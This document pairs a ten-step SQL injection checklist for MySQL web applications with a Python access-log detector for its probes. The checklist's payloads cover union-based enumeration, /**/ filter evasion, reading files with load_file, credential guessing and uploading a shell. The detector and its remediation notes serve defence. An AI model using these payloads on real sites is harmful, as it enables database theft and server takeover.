1. Determine whether injection is possible: append "and 1=1", then "and 1=2".
2. Determine the version: and ord(mid(version(),1,1))>51/* If the page returns normally, the version is 4.0 or higher and a union query can be used.
3. Use ORDER BY to brute-force the number of fields: append order by 10/* after the URL; if the page returns normally, the number of fields is greater than 10.
4. Then use union to find the exact number of fields, for example: and 1=2 union select,......./* until the page returns normally, which means the exact number of fields has been guessed. If spaces are filtered, they can be replaced with /**/.
5. Determine whether the database connection account has write permissions: and (select count(*) from mysql.user)>0/* If the result is an error, the only option left is to guess the administrator account and password.
6. If it returns normally, you can use and 1=2 union select 1,2,3,4,5,6,load_file(char(ASCII values of the file path, separated by commas)),8,9,10/* Note: the argument of load_file(char(ASCII values of the file path, separated by commas)) can also be given in hexadecimal. This is used to read the configuration file, locate the database connection settings, and so on.
7. First guess the user table, for example: and 1=2 union select 1,2,3,4,5,6 .... from user/* If it returns normally, the table exists.
8. Once the table is known, guess its fields: and 1=2 union select 1,username,3,4,5,6 .... from user/* If the field's content is displayed in position 2, the field exists.
9. Guess the password field in the same way; once the guesses succeed, find the back-end login page.
10. Log in to the back end and upload a shell.
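
Each step above leaves a recognisable string in the web server's access log. The following is an added example, not part of the original article: a small Python detector that normalises request query strings (including the /**/ space substitution from step 4) and flags the probe patterns from this checklist. The rule names, log lines, IP addresses and paths are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule names are hypothetical; each pattern maps to a step of the checklist.
RULES = [
    ("boolean_probe",    re.compile(r"\band\s+\d+\s*=\s*\d+")),                 # step 1
    ("version_probe",    re.compile(r"\bord\s*\(\s*mid\s*\(\s*version\s*\(")),  # step 2
    ("order_by_count",   re.compile(r"\border\s+by\s+\d+")),                    # step 3
    ("union_select",     re.compile(r"\bunion\s+select\b")),                    # steps 4-8
    ("mysql_user_read",  re.compile(r"\bfrom\s+mysql\s*\.\s*user\b")),          # step 5
    ("load_file",        re.compile(r"\bload_file\s*\(")),                      # step 6
    ("trailing_comment", re.compile(r"/\*\s*$")),                               # "/*" terminator
]
# Common/combined access-log layout: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')

# Constructed sample log lines (documentation IP ranges, made-up path).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=5%20and%201=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /news.php?id=5%20order%20by%2010/* HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] "GET /news.php?id=5/**/and/**/1=2/**/union/**/select/**/1,2,3/* HTTP/1.1" 200 812',
    '198.51.100.20 - - [10/Oct/2023:13:56:02 +0000] "GET /news.php?id=5&sort=brand HTTP/1.1" 200 5120',
]

def normalize(raw_query):
    """URL-decode, lowercase, and undo the /**/-for-space substitution."""
    q = unquote_plus(raw_query).lower()
    q = re.sub(r"/\*.*?\*/", " ", q)  # closed inline comments act as spaces
    return re.sub(r"\s+", " ", q).strip()

def classify(raw_query):
    """Return the names of all rules the query string matches, in rule order."""
    q = normalize(raw_query)
    return [name for name, rx in RULES if rx.search(q)]

def scan(log_lines):
    """Map client IP -> set of rule names seen in that client's requests."""
    hits = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        found = classify(target.partition("?")[2])
        if found:
            hits.setdefault(ip, set()).update(found)
    return hits

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, sorted(rules))
```

Matching only flags probing in GET query strings; the underlying flaw is fixed with parameterized queries, and the application's database account should have neither the FILE privilege that load_file requires nor read access to mysql.user.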